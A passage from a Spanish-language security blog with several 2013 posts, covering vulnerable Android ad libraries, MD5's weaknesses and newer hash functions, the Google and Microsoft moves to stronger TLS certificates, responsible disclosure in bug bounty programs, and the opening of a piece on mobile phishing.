igual que la publicidad en la web externalizada, se encargan de facilitar al programador que se suscribe (le abstraen a través de SDKs) la labor de posicionar la publicidad, gestionarla, optimizarla y por supuesto... cobrarla. Esto implica dar vía libre a que la publicidad tenga cierto poder sobre la app y, por lo visto, sobre el teléfono. Algunos nombres son: AppNext, Appenda, LeadBolt, MOcean, AppGrade, Adbuddiz.... Hasta aquí, nada que no se pueda trasladar al mundo de la web y la publicidad online. Pero sabemos que se han dado casos, en los que los anuncios externalizados en webs ha permitido que ciertas páginas relevantes sirvan malware, o incluso que se introduzcan en sus redes... ¿Se han de cometer los mismos errores en Android? Dos redes de anuncios con vulnerabilidades y otra "insoportable" Al margen de la molestia que la publicidad agresiva puede suponer de por sí, FireEye ya ha descubierto que dos de estas redes de anuncios sufren serias vulnerabilidades. Ya sabemos que estas librerías suponen un riesgo para la intimidad del usuario (recolectan todo tipo de información), pero algo muy diferente es que permitan controlar un teléfono... La primera la descubrieron en octubre de 2013. La llamaron Vulnaggressive (Vulnerable & Aggressive), y no quisieron decir el nombre concreto, porque ponía en peligro a los millones de usuarios que tuvieran cualquier aplicación que se sustentase con esta librería de publicidad. Un 1.8% de las apps en Google Play con más de un millón de descargas, la usaban. La propia librería permitía (de forma más o menos "oficial"): Descargar y ejecutar cualquier binario en el teléfono. Aceptar comandos de un servidor y enviar información (todo en texto claro por HTTP) Usar WebViews de Android (ventanas en la aplicación que en realidad son páginas web interpretadas... donde se muestran los anuncios) con "enlaces" de JavaScript a Java de forma insegura (gracias a addJavascriptInterface). Muy resumido, esto quiere decir que, con solo visitar una página, se podría llegar a lanzar instrucciones JavaScript (limitadas al navegador, en teoría) que a su vez llaman a Java (ejecución de código en el terminal). En resumen, suponía una jugosa botnet de teléfonos para cualquier atacante, casi lista para ser usada. Google eliminó "algunas" de esas aplicaciones que usaban esa "desconocida" Vulnaggressive... Otro ejemplo es más reciente. InMobi (a esta sí la nombraron). También por FireEye. Unas 2000 aplicaciones en Google Play usan esta red de anuncios. Para poner en situación, es necesario explicar que @JavascriptInterface es una notación que se introdujo en Android 4.1 para mitigar precisamente ese problema de enlaces entre JavaScript y Java. El programador debe usar esta herramienta para limitar los métodos de Java que son accesibles desde JavaScript. InMobi lo usa justo al revés, para poder hacer "de todo" a través de WebViews y JavaScript... desde enviar SMS hasta realizar llamadas sin consentimiento, pasando por la posibilidad de tomar fotografías. Si un atacante simplemente esnifara el tráfico mientras el usuario usa una app y tuviera la posibilidad de modificarlo, podría llegar a controlar el teléfono a través de los anuncios servidos. Por último, mención aparte merece AirPush. Una red de anuncios tan agresiva y un método de publicidad tan insoportable, que la propia Google prohibió su uso en 2012. En realidad estableció por políticas (no técnicamente) la prohibición de utilizar las notificaciones AirPush para enviar spam al usuario... y AirPush era una de las redes que más abusaba de esta técnica. Aunque por supuesto, todavía se pueden encontrar aplicaciones con AirPush en el market... Google Play les dio de plazo hasta el 30 de septiembre de 2013 para ser retiradas... y ahora las va eliminando "a su ritmo". Ejemplo de publicidad más que agresiva en Android, suministrada por appNext ¿Qué es permisible en publicidad? Una vez más, se tropiezan en las mismas piedras. A finales de los 90, internet se convirtió en un campo de batalla de la publicidad y el adware, que se aprovechaban del dominio de Internet Explorer (y su ineficacia) para realizar todo tipo de trucos: pop-ups, anuncios que no podían cerrarse, JavaScript, páginas directamente a favoritos, vídeos, animaciones... Pasaron varios años hasta que los navegadores mejoraron y "se protegieron" contra la publicidad insoportable. Pero no sin "negociar". A la publicidad no se puede renunciar... como mucho, se le ponen ciertos límites. El perfecto ejemplo es cómo Google eliminó de Google Play el eficaz AdBlock Plus, y actúa contra ciertas redes de anuncios "que se pasan" como AirPush. Pero no le pidas más. Su negocio es llevarse bien con todas las partes y el secreto está en mantener el equilibrio, sin molestar demasiado a los usuarios... Esto choca frontalmente con la publicidad tan bien gestionada en su producto estrella, el buscador (no agresiva, no estridente, respetuosa, diferenciada...) que le granjeó la fidelidad de muchos usuarios precisamente a principios de la década pasada. ¿Está dispuesta a perder esa percepción por parte de los usuarios a cambio de un menor control en los programas subidos a su market oficial, a cambio de hacer la vista gorda ante una publicidad "un poco más agresiva"? No lo sabemos, pero sí que según la propia Google, el "problema" del malware en Android, no es para tanto. Una "exageración de las casas antivirus". ¿Se incluye el "adware" en esa afirmación? En definitiva, que quizás habrá que vivir una "guerra" en el campo de batalla de Android, para que probablemente, se sigan finalmente los pasos que convirtieron la publicidad en la red algo regulado y en cierta manera, sostenible, con acuerdos como la coalición AntiSpyware, que "oficializó" en el mundo del escritorio lo que podía o no caracterizarse como publicidad y cruzaba la línea hacia el adware. En la práctica los atacantes siguen abusando en la web, pero al menos existe una especie de regularización y, desde luego, la situación es mejor que hace una década. Sergio de los Santos ssantos@11paths.com @ssantosv
28 de noviembre de 2013
MD5: vulnerabilidades y evoluciones (y II)
Ahora que Microsoft y Google (e incluso Twitter) se han embarcado en una especie de carrera criptográfica para potenciar los algoritmos de cifrado, firma, hash y clave pública, es un buen momento para repasar y entender por qué algunos de estos algoritmos dejan de ser útiles y qué alternativas se manejan. El ejemplo más claro de algoritmo obsoleto (pero aún usado) es MD5. Vulnerabilidades de MD5 Se pueden dar dos tipos principales de vulnerabilidades en los algoritmos de resumen y su seguridad se mide en base a los resultados de la evaluación de estas vulnerabilidades. Resistencia a la preimagen o resistencia a ataques de fuerza bruta. Numéricamente, estos ataques suponen aplicaciones de la función hash 2n veces, siendo n la longitud del resumen. Resistencia a colisiones o a la localización de dos mensajes de entrada que den lugar a un mismo resumen para un mismo algoritmo de cifrado hash (segunda preimagen). Teóricamente se cumple que para confiar en que podemos encontrar dos mensajes que colisionen, no hay que realizar 2n operaciones, sino sólo 2n/2. Esta segunda vulnerabilidad da lugar a cuatro tipos de ataques, con un índice de peligrosidad incremental. El T ipo1 se aplica cuando el atacante es capaz de encontrar colisiones pero no de forma sistemática. El Tipo4 cuando el atacante es capaz de crear un mensaje con sentido cuyo hash colisiona con el hash del mensaje verdadero. La vulnerabilidad frente a la preimagen no fue la mayor debilidad de MD4, pero en todo caso la longitud de resumen de ambos (128 bits) resulta baja en la actualidad. Es en el aspecto de colisiones y segunda preimagen donde MD4 tuvo mayores problemas, y donde se ha demostrado que MD5 también los presenta. El origen de la determinación del algoritmo de cifrado MD5 como vulnerable o "oficialmente roto" data de 2004, cuando Xiaoyun Wang y su equipo anunciaron el descubrimiento de colisiones de hash para MD5. En función de este artículo, quedó demostrado que era posible encontrar una colisión a partir de dos mensajes de 1024 bits con un determinado valor inicial. De ahí en adelante, han surgido numerosas publicaciones en esta línea. Destacar entre ellas la realizada en 2007 por Arjen Lenstra de Bell Laboratories. Basándose en el trabajo de Wang desarrolló un método para construir colisiones en 2 24.8 procesados (unos 10 segundos). El objetivo de todas estas técnicas es el de conseguir multicolisiones, algunas de las cuales surgen a partir de la demostración de la posibilidad de generar nuevos pares de colisiones a partir de una dada. Este hecho quedó probado tras la comprobación matemática de la siguiente enunciación: Esto se debe al uso de la construcción de Merkle-Damgård, que permite trabajar con números ilimitados de bloques de entrada, pero también la aparición de esta vulnerabilidad. Teniendo en cuenta que el algoritmo de cifrado MD5 presenta debilidades en la tarea de resistencia a la colisión y que la resistencia a la segunda preimagen queda más que comprometida tras los resultados de los estudios citados, se puede efectivamente concluir que el algoritmo MD5 está "roto". MD5 roto en la vida real Desde 1996 se empezaron a conocer "indicios" sobre la debilidad del algoritmo. En 2004 se consiguió crear dos certificados X.509 distintos con igual hash MD5. En verano de 2005, un australiano consiguió anular una multa de tráfico. El abogado que representaba al amonestado recurrió una denuncia, argumentando que no se había probado que la imagen obtenida por la cámara asociada al radar no hubiese sido modificada de ninguna forma. Las autoridades australianas de tráfico respondieron que se utilizaba el algoritmo MD5 para obtener el hash de las imágenes obtenidas. No encontraron a ningún perito que demostrase ante el tribunal la validez de este algoritmo, y por tanto se libró de la multa. A finales de 2008, Alexander Sotirov, Marc Stevens y otros investigadores consiguieron (usado la potencia de 200 consolas PlayStation3) hacer que cualquier certificado SSL pareciese válido usando certificados que basaban su confianza en MD5. Pero en cierta forma, todo fueron ataques de laboratorio hasta que llegó TheFlame, y usó varias debilidades (entre ellas de MD5) para conseguir un certificado de Microsoft válido. Los problemas hasta entonces más o menos "teóricos" estaban siendo usados por atacantes. Además de las colisiones, MD5 tiene otros problemas. Para una firma o hash debe ser matemáticamente muy complicado realizar el proceso contrario: calcular los datos que produjeron el hash. Por esta razón, muchos programas almacenan el MD5 de las contraseñas de usuarios en las bases de datos. Hace algunos años se popularizaron las tablas rainbow con información preprocesada sobre hashes MD5. Esto, en teoría, permite a alguien que tenga acceso a esos resúmenes, realizar el proceso inverso en tiempo razonable. Se ha popularizado como método eficaz de "crackeo" para contraseñas de este tipo, con lo que el almacenamiento de credenciales en este formato también se considera ya inseguro. Conclusión: Evolución hacia SHA-1, SHA-3 y Whirlpool La resistencia del algoritmo SHA-1 se ha puesto en duda últimamente, por lo que resulta una solución temporal. Aunque su diseño resulta más robusto que el de MD5 con un mayor tamaño de hash code (160 bits), presenta ciertas similaridades con MD4 y MD5 que lo hacen vulnerable al igual que los son éstos. Microsoft ya ha declarado que no lo quiere en sus certificados. A pesar de que las demostraciones presentadas consiguen superar la seguridad del algoritmo en 2 63 operaciones, relativamente más rápido que un ataque de fuerza bruta (que requeriría 2 80 operaciones), todavía son muchas operaciones. Aunque en el futuro es cada vez más probable que romper esta función sea trivial, al aumentar las capacidades de los sistemas de cálculo y, previsiblemente, al centrarse los ataques y estudios en SHA-1 ahora que MD5 ya está "roto". Actualmente, ya se contemplan y utilizan funciones de SHA de mayor tamaño (por ejemplo, SHA‑512, de 512 bits de longitud es muy usada en certificados). Sin embargo, se busca ya una nueva función hash estandarizada que permita sustituir a SHA-1. Entre las candidatas, SHA-3 (originalmente Keccak, elegido a finales de 2012) y Whirlpool (adoptado como parte del estándar ISO/IEC 10118-3). * MD5: vulnerabilidades y evoluciones (I) Julia Llanos julia.llanos@11paths.com
27 de noviembre de 2013
MD5: vulnerabilidades y evoluciones (I)
Ahora que Microsoft y Google (e incluso Twitter) se han embarcado en una especie de carrera criptográfica para potenciar los algoritmos de cifrado, firma, hash y clave pública, es un buen momento para repasar y entender por qué algunos de estos algoritmos dejan de ser útiles y qué alternativas se manejan. El ejemplo más claro de algoritmo obsoleto (pero aún usado) es MD5. Hash codes Los hashes (hash codes) son los resultados de mapear unos determinados valores de entrada a un código de tamaño fijo. Las funciones hash se encargan de llevar a cabo este proceso. Su uso en criptografía dio lugar a la aparición del grupo de algoritmos criptográficos denominados algoritmos de resumen o hash, donde los hash codes resultantes se definirán como resúmenes. Las tres propiedades más importantes que debe presentar una función hash o en su defecto, un algoritmo de resumen, son: Resistencia a la colisión. Las colisiones son el problema inherente a establecer una relación entre un conjunto infinito de entrada (cualquier flujo de bytes) y un conjunto finito (el número de combinaciones que ofrezca la longitud del hash). Esta resistencia se definirá como la dificultad para encontrar dos entradas que den como salida un mismo hash code. Resistencia a la preimagen o dificultad presentada para deducir la entrada a partir de la función hash y el hash code. Este problema es el que tienen por ejemplo, las bases de datos que almacenan el hash MD5 de las contraseñas. Actualmente es relativamente sencillo deducir el texto claro a partir del hash, gracias en parte a los precáculos realizados con las rainbow tables. Resistencia a la segunda preimagen o dificultad para que, dado una entrada fija, sea posible encontrar otra que tenga un mismo hash code resultante. La gran mayoría de funciones hash que han sido utilizadas en la práctica para la criptografía, pertenecían a la familia MD ( Message-Digest Algorithm ). Inspiradas en ellas, o en sus debilidades, han surgido algunas de las funciones hash modernas, entre las que destacan la familia SHA ( Secure Hash Algorithm ) y RIPEMD ( RACE Integrity Primitives Evaluation Message Digest ). Existen algunas otras funciones, como Whirlpool, que comienzan a surgir en la actualidad, aunque su tasa de uso aún es muy baja. Daremos un repaso a sus principales características. MD family Esta colección de funciones fue originalmente desarrollada por Ron Rivest (MIT) para RSA Security. La primera propuesta fue MD2, un novedoso diseño orientado a byte. Esta fue rápidamente seguida por MD4 y MD5, dos funciones hash más modernas con un diseño de 32 bits. A pesar de tratarse de algoritmos que irrevocablemente están condenados a la aparición de colisiones, MD4 inspiró la mayoría de los diseños de funciones hash posteriores como los ya citados SHA y RIPEMD. SHA family La familia SHA es un sistema de funciones hash criptográficas relacionadas con la Agencia de Seguridad Nacional de los Estados Unidos y publicadas por el National Institute of Standards and Technology (NIST). Presenta una metodología de operación muy similar a la de MD5, aunque con la variación de ofrecer un resumen de 160 bits, lo que lo hace más robusto. El primero en salir fue SHA (posteriormente renombrado SHA-0 para evitar confusiones). Dos años más tarde el primer sucesor de SHA fue publicado con el nombre de SHA-1. Hoy en día existen cuatro variantes más publicadas bajo el nombre de SHA-2, cuyas diferencias se basan en un diseño algo modificado y rangos de salida incrementados: SHA-224, SHA-256, SHA-384, y SHA-512. En la actualidad empieza a dibujarse el SHA-3 elegido como tal en octubre de 2013. RIPEMD family Fueron desarrollados por el grupo de investigación COSIC en Bélgica. El primer algoritmo de RIPEMD nació basado en los principios de diseño de MD4. Debido a los fallos de seguridad detectados, apareció la versión RIPEMD‑160, con 160 bits de resumen, similar en seguridad a SHA-1. Con RIPEMD‑160 también surgieron RIPEMD‑256 y RIPEMD‑320, entre otros. Si bien sus niveles de seguridad son igual de altos, el incremento en el número de bits del resumen reduce las posibilidades de colisión aleatoria. Un repaso a MD5 (Message Digest Algorithm 5) El algoritmo fue propuesto como reemplazo a MD4 después de que Hans Dobbertin presentase formalmente sus vulnerabilidades en 1994. También fue de los primeros en alertar, en 1996, de que MD5 debía ser reemplazado. El diseño de MD5 se llevó a cabo orientado a máquinas de 32 bits. Sin embargo, su funcionamiento, más seguro que su predecesor, conllevaba un proceso más lento. Atendiendo al artículo publicado por Rivest, el funcionamiento de MD5 se resume en 4 pasos, a saber: Adición o padding de bits hasta alcanzar los tamaños deseados. Más concretamente, se añade un 1 y una cadena de ceros hasta ser congruente con 448 módulo 512. Sobre el mensaje "padeado" se añade una variable de 64 bits (448+64=512) que completará el último bloque y que contendrá la información de la longitud del mensaje pre-padding. Inicializar el búfer MD donde se llevará a cabo la computación del hash del mensaje. Cada búfer será un registro de 32 bits inicializados como sigue: Procesado del mensaje en bloques de 16 palabras. Tomando de entrada estas palabras de 32 bits, se definen cuatro funciones auxiliares: Mediante un proceso iterativo que utiliza adicionalmente una tabla de 64 valores construida a partir de la función seno detallado en el artículo de Rivest, se producen cuatro palabras de salida de 32 bits que compondrán el resumen (4x32=128 bits). El efecto final sobre el mensaje será un procesado de una longitud arbitraria del mensaje en bloques de 512 bits generando un resumen de 128 bits. Veremos en la siguiente entrega sus debilidades y qué alternativas se han propuesto. * MD5: vulnerabilidades y evoluciones (y II) Julia Llanos julia.llanos@11paths.com
25 de noviembre de 2013
La "carrera criptográfica" entre Google y Microsoft
Google y Microsoft están dando llamativos pasos adelante para mejorar la seguridad de la criptografía en general y de TLS/SSL en particular, elevando los estándares en los certificados y protocolos. En un mundo tan reactivo como el de la seguridad, sorprenden estos movimientos. Desde luego, no son gestos gratuitos (mejoran su imagen de cara a potenciales clientes, entre otras cosas). Pero en la práctica, ¿son útiles? Google: qué ha hecho Google anunció hace meses que iba a elevar la seguridad de sus certificados utilizando claves RSA de 2048 bits como mínimo. Ha terminado de hacerlo antes de lo previsto. Quieren eliminar de la industria los certificados de 1024 bits para el año 2014 y crear todos de 2048 a partir de ahora. Algo bastante optimista, teniendo en cuenta que son muy usados aún. A principios del año que viene, Chrome advertirá a los usuarios de los certificados que no cumplan sus requisitos al visitar una web. Elevar a 2048 los bits de las claves de los certificados implica que intentar romper el cifrado por fuerza bruta se vuelve poco práctico con la tecnología actual. Además, relacionado con este esfuerzo hacia las comunicaciones cifradas, desde octubre de 2011 Google cifra el tráfico para usuarios presentados en sus dominios. Este septiembre de 2013, comenzó a hacerlo para todas las búsquedas. También ha intentado instaurar poco a poco el "certificate pinning" y el HSTS para intentar que no se interpongan certificados intermedios en la navegación. Por si fuera poco, sigue adelante con su proyecto de certificate transparency. Parece que Google está muy preocupada por la seguridad de sus usuarios y en concreto (aunque a muchos les pueda resultar irónico) por su privacidad. De hecho, afirman que "eliminar las claves RSA de 1024 bits en los certificados, significa un esfuerzo de la industria que estamos contentos de apoyar, particularmente a la luz de las preocupaciones surgidas por la vigilancia gubernamental y otras formas de intrusión no deseada". Microsoft: qué ha hecho En la última actualización de Microsoft, se anunciaron medidas importantes para mejorar la criptografía general del sistema operativo. Para empezar no soportará el cifrado RC4, sobradamente superado (se creó en 1987) y culpable de muchos ataques. Ofrece herramientas para deshabilitarlo en todos sus sistemas y pretende erradicarlo en breve de toda aplicación. De hecho, en la versión 8.1 de su sistema operativo y con Internet Explorer 11, se cambia por defecto la versión de cifrado a TLS 1.2 (que puede usar AES-GCM en vez de RC4). Este protocolo también usa SHA2 normalmente. Otro cambio en los certificados, es que no permitirá el algoritmo de hash SHA1 ni en certificados para firmar código ni en certificados SSL. SHA1 es un algoritmo que produce un hash de 160 bits, y se utiliza durante la generación de certificados con el protocolo RSA para "hashear" el propio certificado. El hash será lo que firme la autoridad certificadora, demostrando así su confianza. Hace ya tiempo que NIST desaconsejó el uso de SHA1, pero nadie le hizo mucho caso. Resulta un movimiento muy anticipativo para Microsoft, acostumbrados a una reactividad exasperante. ¿Por qué todo esto? ¿Es útil? Microsoft y Google están decididos a mejorar la criptografía en general, y el TLS/SSL en particular. Con las medidas adoptadas entre los dos, se eleva sustancialmente la seguridad de esta forma fundamental de cifrar el tráfico en la red. Certificado de 2048 bits, usando SHA2 (SHA256, concretamente). Los certificados que acreditan claves públicas calculadas según RSA con valores de 512 bits, fueron rotos en la práctica en 2011. En 2010, se factorizó de forma distribuida y con un algoritmo de propósito general u n número de 768 bits (212 dígitos), el más alto conocido. Así que en la práctica, el uso de un número representable en 1024 bits es "seguro", aunque se podría discutir si un futuro cercano supondrían un problema. Google se cura en salud. Pero el foco del problema también es otro. El uso de certificados más robustos en SSL, no es el principal obstáculo para el usuario. De hecho, la introducción de nuevas advertencias (Chrome alertará sobre certificados de 1024 bits) solo puede confundirlo más: "¿Qué significa que usa 1024 bits? ¿Es seguro o no? ¿Esto en el sitio correcto? ¿Qué decisión tomo?". El exceso de alertas solo relaja la seguridad ( "¿Qué alerta es la buena cuando se me alerta tanto de sitios seguros como de inseguros?"). El problema del SSL es que está socialmente roto, que no se entiende... y no tanto técnico desde el punto de vista del usuario. Al usuario le alegrará que su navegador utilice criptografía más robusta (porque supuestamente la NSA no podrá espiarle...), pero no servirá de nada si, confundido, acepta un certificado no válido durante la navegación, sin ser consciente de que está introduciendo un hombre en el medio. Si adoptamos la teoría de que la NSA puede romper las comunicaciones porque dispone ya de la tecnología necesaria para aplicar la fuerza bruta contra certificados de 1024 bits, esto sí es útil. El problema sería que no fuese necesario romper ni aplicar fuerza bruta sobre nada, sino que las compañías ya colaborasen para entregarle a la NSA el tráfico descifrado... También podríamos descartar que la NSA cuente ya con sistemas propios para romper cifrado de claves de 2048 bits y por eso ahora se permita su estandarización... ¿o no? No hay que remontarse mucho en la historia (apenas 10 años) para oír historias "conspiranoicas" como estas en el mundo del SSL. Certificado autofirmado creado en Windows 8 que usa MD5 y 1024 bits. En el caso de Microsoft también es curioso. Obviamente, este movimiento en los certificados está motivado por TheFlame. Utilizar MD5 con RSA les jugó una mala pasada, permitiendo que los atacantes firmaran código en su nombre. Y no puede volver a ocurrir. Esto pone a Microsoft al frente de la retirada del uso de SHA1 para certificados, puesto que la industria le seguirá. Pero en realidad, si bien RC4 sí está roto, SHA1 no tiene tan mala salud. Apenas nos hemos desecho de MD5 en ciertos certificados cuando ya Microsoft adelanta la muerte de SHA1. Esto nos deja solo con la posibilidad de usar SHA2 (sha256RSA o sha256withRSAEncryption normalmente en los certificados, aunque SHA2 permite el uso de salidas de 224 hasta 512 bits). Curiosamente, es el momento oportuno porque XP se retira, y ni siquiera soportaba nativamente SHA2 (lo hizo a partir del service pack 3). Todavía tiene trabajo que hacer, porque el SHA1 está muy arraigado ( Windows 7 firma la mayoría de sus binarios con SHA1, Windows 8, con SHA2), por eso se ha puesto como fecha de retirada definitiva 2016 en certificados para firmar y 2017 en certificados para su uso en SSL. Queda por saber cómo reaccionarán las autoridades certificadoras. Por otro lado, con respecto al uso de TLS 1.2 obligatorio (relacionado, porque es el protocolo que soporta SHA2), tenemos que conocer qué ataques se han publicado recientemente contra SSL para saber qué soluciona realmente. Muy sucintamente: BEAST, en 2011. El error se fundamentaba en CBC y RC4. Efectivamente se soluciona con TLS 1.1 y 1.2. Pero debemos tener en cuenta que ambas partes (servidor y navegador) deben soportarlo. CRIME: Es un ataque que permite recuperar cookies si se usa compresión en TLS. Deshabilitando la compresión TLS, es posible eludirlo. BREACH: Permite también recuperar cookies. Pero se basa en la compresión HTTP, no TLS, por tanto no se puede "deshabilitar" desde el navegador. Se es vulnerable se use la versión TLS que se use. Lucky 13: Solucionado en software principalmente. También en TLS 1.2. TIME: Una evolución de CRIME. No requiere que un atacante haga de man-in-the-middle, sino que solo necesita JavaScript. Un problema más en los navegadores que en el TLS. Certificado todavía muy común, que usa SHA1withRSAEncryption y claves de 1024 De ninguno de estos ataques se tiene constancia de que estén siendo usados por atacantes. La imposición de 1.2 sin RC4 es un movimiento necesario, pero aún arriesgado. Internet Explorer (hasta el 10) soporta TLS 1.2 aunque deshablitado ( solo Safari lo activa por defecto y los demás, lo implementan desde muy recientemente). La versión 11 lo hará por defecto.Queda por saber cómo reaccionarán los servidores, que también deben dar soporte a TLS 1.2. En resumen, parece que estas medidas aportan seguridad técnica (al menos a largo plazo). Aunque lógicamente detrás se encuentren tanto intereses propios de la empresa (evitar problemas que ya han sufrido) como de imagen (liderar la "carrera de la criptografía"), cualquier mejora es bienvenida y esta "guerra" para liderar la criptografía, que fundamentalmente significa ser el más proactivo "frente a la competencia", elevará sustancialmente el listón. Sergio de los Santos ssantos@11paths.com @ssantosv
20 de noviembre de 2013
Responsible full disclosure... por ambas partes
Normal 0 21 false false false ES X-NONE X-NONE MicrosoftInternetExplorer4 /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Tabla normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin-top:0cm; mso-para-margin-right:0cm; mso-para-margin-bottom:10.0pt; mso-para-margin-left:0cm; line-height:115%; mso-pagination:widow-orphan; font-size:11.0pt; font-family:"Calibri","sans-serif"; mso-ascii-font-family:Calibri; mso-ascii-theme-font:minor-latin; mso-fareast-font-family:"Times New Roman"; mso-fareast-theme-font:minor-fareast; mso-hansi-font-family:Calibri; mso-hansi-theme-font:minor-latin;} La revelación responsable de vulnerabilidades es un viejo debate, pero no necesariamente zanjado. Vamos a observarlo desde el punto de vista del sistema vulnerable o afectado, no desde el investigador (que es al que normalmente se le exigen las responsabilidades). Si se practica la revelación responsable, este adjetivo debe aplicarse tanto al que lo detecta, como al afectado. La anécdota En ElevenPaths, alertamos hace algunas semanas sobre un pequeño fallo en la web de Cisco, en concreto de su servicio Meraki de redes a través de la nube. En una ruta concreta se divulgaba información quizás sensible. Entre otros, se observa el nombre de usuario ssh, el servidor SVN, rutas a la red interna, y otros nombres de usuarios SVN. Quizás no se encuentren actualizados los datos y su impacto sea mínimo, pero es una información que definitivamente no debería estar ahí. Cisco determina en su programa, bajo estas condiciones, las normas para alertar sobre fallos de seguridad: We take these reports seriously and will respond swiftly to fix verifiable security issues. [...] Any Cisco Meraki web service that handles reasonably sensitive user data is intended to be in scope. This includes virtually all the content under *.meraki.com. [...] It is difficult to provide a definitive list of bugs that will qualify for a reward: any bug that substantially affects the confidentiality or integrity of user data is likely to be in scope for the program. La revelación de información se les notificó a principios de noviembre. Dos días después la respuesta de Meraki fue peor de lo esperado: I have looked into your report and, unfortunately, this was first reported to us on 9/23/13, with a resolution still pending from our engineers. Esto implica qu e se alegaba que un tercero lo había descubierto previamente y lo que es peor, que el problema les era conocido desde hacía al menos cinco semanas y aún no lo habían (y no lo han) resuelto. Simplemente se trata eliminar una página de un servidor o protegerla con contraseña. Otros problemas y vulnerabilidades descubiertos por nuestro equipo, bastante más complejos, han sido resueltos en mucho menos tiempo. Los problemas que se pueden zanjar eliminando una página, prácticamente suelen solucionarse en el mismo día que se detectan. Salvando absolutamente todas las distancias, otros usuarios que han participado en los "bounty programs" de Facebook, PayPal ( especialmente torpe con su programa) o Google, se quejan de que han recibido, en "demasiadas" ocasiones, la respuesta de que ya alguien les había alertado previamente. Incluso afirma que al pedirle a PayPal pruebas de que alguien se les había adelantado, nunca contestaron. Es incluso más común oír que los fabricantes tardan demasiado en corregir cualquier error cuando se alerta de ellos de forma privada. Antecedentes Al margen de la anécdota introductoria, la "divulgación responsable" es un viejo debate, y existen muchos ejemplos con los que periódicamente se ha reabierto. En resumen: al divulgar una vulnerabilidad, en cierta manera, se ataca directamente al crimen en la red donde más le duele, devaluando un valor muy apreciado. También, hacer público cualquier error hace que su prevención y detección sea mucho más generalizada y por tanto, previene futuros ataques. Incluso, podría llegar a "detener" ataques que hipotéticamente se estuviesen realizando aprovechando un fallo antes de que el investigador lo hiciese público. En la parte negativa, cuando se hace público, otros atacantes lo incorporan a su arsenal y pueden aprovechar esa vulnerabilidad para lanzar nuevos ataques. Aunque a su vez, ataques de difusión masiva siempre van acompañados de defensas mucho más variadas y asequibles. Por último también es cierto que el hecho de hacer públicos los fallos acelera el proceso de corrección en el fabricante. El "full disclosure" en realidad, no elimina el impacto de una vulnerabilidad sino que lo transforma: desde un hipotético uso exclusivo del fallo en el mercado negro, inadvertido y muy peligroso, con objetivos muy concretos y valiosos donde pocos ataques dan un alto beneficio; hasta ataques indiscriminados aunque cazados en mayor medida por los sistemas de detección. Otras responsabilidades Ahora que están de moda los programas de recompensa, son muchas las compañías que han intentado motivar la revelación responsable premiando económicamente a los que descubren vulnerabilidades y problemas de seguridad. Pero es necesario recordar que desde la posición del afectado, también se crean nuevas responsabilidades. Es muy habitual que se hable de que, por ejemplo, el descubrimiento se atribuirá al primero que escribe al equipo de seguridad. Pero, ¿cómo se demuestra esto? ¿Cómo podría acreditar alguien que ha enviado un correo describiendo un fallo o vulnerabilidad antes que nadie? Los fabricantes podrían obligar a utilizar PGP firmado con timestamp o incluso servicios gratuitos como eGarante para alertar y garantizar los avisos, pero no parece que ninguno recomiende explícitamente su uso. Las empresas que ofrecen recompensas, sugieren en el mejor de los casos el cifrado en las comunicaciones, pero por confidencialidad, más que por la demostración de autoría. También debemos atender a la responsabilidad de arreglar en un tiempo razonable una vulnerabilidad o fallo. ¿Cuánto tiempo es aceptable? En agosto de 2010 Zero Day Initiative de TippingPoint, harto de vulnerabildiades que se eternizaban, impuso una nueva regla destinada a presionar a los fabricantes de software para que solucionen lo antes posible sus errores: si pasados seis meses desde que se les avise de un fallo de seguridad de forma privada, no lo han corregido, lo harían público. Para fallos web triviales, como el caso de la anécdota, deberían darse menos tiempo, incluso. Lo que añade un nuevo problema: ¿existe alguna forma "justa" o responsable de evaluar la gravedad de un problema y por tanto, su valor económico a la hora de recompensarlo? En el caso de las compañías que hacen de intermediarias, el precio suele estar más o menos fijado, pero en los bounty programs "privados" de cada empresa, este puede ser un valor muy subjetivo. Los programas de recompensa pretenden premiar a los investigadores, motivarlos para que las vulnerabilidades salgan del circuito del mercado negro, y además obtener una "auditoría" avanzada a un precio que consideren justo. También pretenden ofrecer una imagen de compañía responsable y que premia el trabajo de los profesionales de la seguridad... pero deben estar preparados para responder diligentemente y actuar de forma tan profesional y responsable como exigen a los investgadores, para mantener esa imagen que se pretende proyectar. Si no, que se lo digan a Yahoo!, que a mediados de año, fue ridiculizada tras ofrecer 12.50 dólares (canjeables en productos de la propia Yahoo!) a una compañía que descubrió serios problemas de seguridad en su red. Sergio de los Santos ssantos@11paths.com @ssantosv
13 de noviembre de 2013
Phishing en dispositivos móviles: ¿es más fácil?
El phishing es ya una de las "viejas" estafas en Internet. Aunque el concepto en los noventa, no fue hasta principios de esta década que se popularizó, justo cuando se popularizó la banca online. Desde entonces, se han intentado utilizar diferentes técnicas para mejorar la estafa, pero en esencia sigue funcionando de manera muy similar a sus comienzos. ¿Qué han aportado los smartphones y las tables a las técnicas de phishing? El phishing tradicional intentó disimularse a sí mismo con diferentes técnicas más o menos elaboradas. Durante un tiempo intentaron utilizar siempre dominios muy parecidos a los que intentaban suplantar. Luego aprovechaban JavaScript para ocultar la barra del navegador (Internet Explorer 6) con la URL real del banco, superponiendo una imagen emergente en el punto exacto para que se confundiera con el propio navegador ( algo parecido se hizo en iOS en 2010). Experimentaron con diferentes vulnerabilidades en el navegador para que el "ancla" en HTML simulara la URL real, pero realmente te llevara a otra web al hacer click sobre un enlace. Otras técnicas que se observaron durante un tiempo fueron los phishings bajo SSL. Finalmente, el phishing de hoy no se diferencia en exceso del de hace 10 años. Pero han aparecido nuevas plataformas que se utilizan para consultar webs. El navegador tradicional en el sistema de escritorio ya no es el único objetivo. ¿Qué oportunidades ofrecen estos dispositivos a los atacantes? Las dimensiones de la pantalla Barra de direcciones oculta El primer factor que marca la diferencia y puede ser relevante con respecto al phishing son las dimensiones en sí de los dispositivos. Cuando el usuario entra a un sitio web con su teléfono o tablet, el dispositivo móvil intenta ofrecer la mayor visibilidad posible en la pantalla. Esto hace que, por ejemplo, e n Safari la barra de direcciones desaparezca rápidamente. No saber en qué página se está, aumenta el peligro y facilita la labor de los atacantes. Para añadir credibilidad a su ataque, algunos atacantes han implementado una barra que simula la original. Aunque no todos los navegadores ocultan la barra por defecto, otros sí lo hacen cuando se realiza un desplazamiento hacia abajo en la web. Algunos atacantes realizan el desplazamiento automáticamente (añadiendo un ancla a la dirección, 